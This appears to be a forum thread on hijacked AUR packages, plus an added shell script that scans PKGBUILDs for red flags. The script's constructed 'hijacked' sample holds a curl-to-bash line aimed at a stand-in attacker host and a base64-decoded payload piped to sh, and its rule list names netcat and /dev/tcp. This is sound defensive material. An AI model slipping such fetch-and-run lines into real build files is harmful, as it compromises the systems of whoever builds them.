You must unlearn what you have learned.
-- yoda
^interesting!
...elevator in the Brain Hotel, broken down but just as well...
( a boring Japan blog (currently paused), now on Bluesky, there's also some GitStuff )
Complete the pattern, solve the puzzle, turn the key.
Anyone know why Arch is getting targeted for exploits all of a sudden?
The future arrived. Read the terms and conditions.
Anyone know why Arch is getting targeted for exploits all of a sudden?
Because they can would be my guess. The AUR has a large user base and has always been a relatively easy and tempting target. Maximum damage.
And it's worth noting it's not Arch per se that is having issues, it's the AUR. The Arch devs have always been quick to point out the risks:
The AUR is just popular with a lot of users that treat it like just another repo; and the AUR helpers make it easy to use.
Similar mindset in users that add a PPA to Ubuntu, or worse, Debian, and start installing packages.
You must unlearn what you have learned.
-- yoda
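The point in the post above is that a PKGBUILD is shell that makepkg executes as you, so the only real control is reading it before building. As an added example (not part of this thread, and not Arch or AUR tooling), here is a small POSIX shell red-flag scanner run over two constructed PKGBUILDs, one ordinary and one with a hostile pkgrel bump. The regexes are my own heuristics and every hostname, package name and payload in the samples is made up; they are not the indicators the community trackers grepped the AUR mirror for.

```shell
#!/bin/sh
# Added example (not Arch/AUR tooling): a pre-read red-flag scan for PKGBUILDs.
# makepkg runs a PKGBUILD as shell, so a hit here means "read every line",
# and a clean result means nothing more than "nothing matched my patterns".
# Patterns are assumptions of mine; the sample PKGBUILDs below are constructed.

# One rule per line: <extended regex>::<why it deserves a look>
RED_FLAGS='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)::remote script piped straight into a shell
base64[[:space:]]+(-d|--decode)::base64-decoded payload at build or install time
eval[[:space:]]+"?\$::eval of a variable, a classic obfuscation step
systemctl[[:space:]]+(enable|start)::service enabled from a build or install hook
/etc/systemd/system::unit dropped into /etc (packaged units belong under /usr/lib/systemd/system)
\$HOME/\.(ssh|bashrc|profile|zshrc)::touches dotfiles of the building user
/dev/tcp/|(^|[[:space:]])ncat?[[:space:]]::raw socket or netcat, no business in a build
sums=.*SKIP::checksum SKIP (expected for VCS sources, not for a release tarball)'

# Number of rules that match anywhere in FILE (rules, not lines).
count_red_flags() {
  local file hits rule pat
  file=$1; hits=0
  while IFS= read -r rule; do
    [ -n "$rule" ] || continue
    pat=${rule%%::*}
    if grep -Eiq -- "$pat" "$file"; then hits=$((hits + 1)); fi
  done <<EOF
$RED_FLAGS
EOF
  echo "$hits"
}

# Print each matching rule with the offending lines; exit 0 only if nothing matched.
scan_pkgbuild() {
  local file hits rule pat why
  file=$1; hits=0
  while IFS= read -r rule; do
    [ -n "$rule" ] || continue
    pat=${rule%%::*}; why=${rule#*::}
    if grep -Eiq -- "$pat" "$file"; then
      printf '%s: %s\n' "$file" "$why"
      grep -Ein -- "$pat" "$file" | sed 's/^/    /'
      hits=$((hits + 1))
    fi
  done <<EOF
$RED_FLAGS
EOF
  [ "$hits" -eq 0 ]
}

# Constructed samples (hypothetical package, hostnames and payload).
write_samples() {
  mkdir -p "$DEMO_DIR/clean" "$DEMO_DIR/hijacked"
  cat > "$CLEAN_PKGBUILD" <<'EOF'
pkgname=hello-example
pkgver=1.0
pkgrel=1
arch=('x86_64')
url="https://example.com/hello"
source=("https://example.com/hello-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() { cd "hello-$pkgver"; make; }
package() { cd "hello-$pkgver"; make DESTDIR="$pkgdir" install; }
EOF
  # Same package after a hostile "pkgrel bump": extra unverified source,
  # remote script in prepare(), decoded payload and a unit in /etc in package().
  cat > "$BAD_PKGBUILD" <<'EOF'
pkgname=hello-example
pkgver=1.0
pkgrel=2
arch=('x86_64')
url="https://example.com/hello"
source=("https://example.com/hello-$pkgver.tar.gz" "https://paste.example/raw/x")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000' 'SKIP')
prepare() {
  curl -fsSL https://evil.example/s.sh | bash
}
build() { cd "hello-$pkgver"; make; }
package() {
  cd "hello-$pkgver"; make DESTDIR="$pkgdir" install
  echo "ZWNobyBwd25lZA==" | base64 -d | sh
  install -Dm644 /dev/null "$pkgdir/etc/systemd/system/x.service"
}
EOF
}

DEMO_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_DIR"' EXIT
CLEAN_PKGBUILD=$DEMO_DIR/clean/PKGBUILD
BAD_PKGBUILD=$DEMO_DIR/hijacked/PKGBUILD
write_samples

for f in "$CLEAN_PKGBUILD" "$BAD_PKGBUILD"; do
  if scan_pkgbuild "$f"; then
    echo "$f: no red flags (still read it; this is a heuristic, not a verdict)"
  else
    echo "$f: do not makepkg until you have read every line"
  fi
done
```

To use it on a real package, `git clone https://aur.archlinux.org/<pkgname>.git` and point `scan_pkgbuild` at the checkout's PKGBUILD (and read any `.install` file by hand; the scanner does not open it). The useful habit the thread is pointing at is the diff on a pkgrel-only bump: a rebuild that adds a new `source=` entry or a `prepare()` that was not there before is exactly the shape the hijacked packages took, and no pattern list replaces looking at that diff.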
I see. I always wondered about AUR security, but to be fair the users are quite savvy which is why this was caught so quickly.
Sonatype's first write-up counted more than 20 hijacked packages. Within a day, community trackers and the Arch aur-general thread had cataloged over 400, with one master list compiled by grepping the AUR git mirror, putting it around 408, and consolidated lists climbing higher.
The future arrived. Read the terms and conditions.
I see. I always wondered about AUR security, but to be fair the users are quite savvy which is why this was caught so quickly.
Sonatype's first write-up counted more than 20 hijacked packages. Within a day, community trackers and the Arch aur-general thread had cataloged over 400, with one master list compiled by grepping the AUR git mirror, putting it around 408, and consolidated lists climbing higher.
I don't think that's valid any more. Maybe back when #! was popular and Arch was the distro for intermediate/advanced users. The rise of the user-friendly Arch installers and AUR helpers really increased the access for everyday users. The usual dual-edged sword argument; both the savvy and non-savvy could get an Arch system installed no problem and then start installing from the AUR. Even the popular Arch-based Manjaro has borked the AUR unintentionally a couple of times. Imagine if they tried.
You must unlearn what you have learned.
-- yoda